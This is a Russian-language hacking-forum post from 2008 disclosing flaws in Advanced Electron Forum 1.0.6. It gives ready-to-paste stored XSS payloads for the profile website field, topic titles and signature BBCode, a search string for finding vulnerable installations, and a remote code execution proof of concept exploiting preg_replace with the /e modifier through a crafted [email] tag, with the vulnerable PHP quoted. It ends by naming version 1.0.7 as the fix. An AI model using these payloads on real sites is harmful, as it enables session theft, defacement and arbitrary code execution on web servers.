
09.09.2008, 15:54
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Форум: Advanced Electron Forum(AEF)
Версия: 1.0.6
Активные XSS
1 активная
Заходим в профиль уявимое поле WWW: вводим
Код:
"><script>alert('xss')</script>
2 активная
Создаём тему в названии темы вводим
Код:
"><script>alert('xss')</script>
3 активная
В подписи вводим:
Код:
[UR*L]http://" onmouseover="alert('xss');"[/URL]
[IM*G]http://" onmouseover="alert('xss');"[/IMG]
Поиск: Powered By AEF 1.0.6 © 2008 Electron Inc.
Скачать форум: http://www.anelectron.com/download.php
(c) ~!Dok_tOR!~
UPDATE
Advanced Electron Forum <= 1.0.6 Remote Code Execution
Сценарий /main/functions/bbc_functions.php
Уязвимый код:
PHP код:
//Email Links
if($globals['bbc_email']){
$text = preg_replace(
array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
"/\[email\](.*?)\[\/email\]/ies"),
array('check_email("$1", "$2")',
'check_email("$1", "$1")'), $text);
}
[/email]
Уязвимость существует из-за небезопасного вызова функции "preg_replace()" с параметром "e". Удаленный пользователь может с помощью специально сформированного тега выполнить произвольный PHP код на целевой системе с привилегиям Web сервера.
Пример:
Код:
[*email]{${phpinfo()}}
* - убрать конечно.
Решение: Установите последнюю версию 1.0.7 с сайта производителя.
Original link
Последний раз редактировалось ~!DoK_tOR!~; 04.10.2008 в 22:46..
|
|
|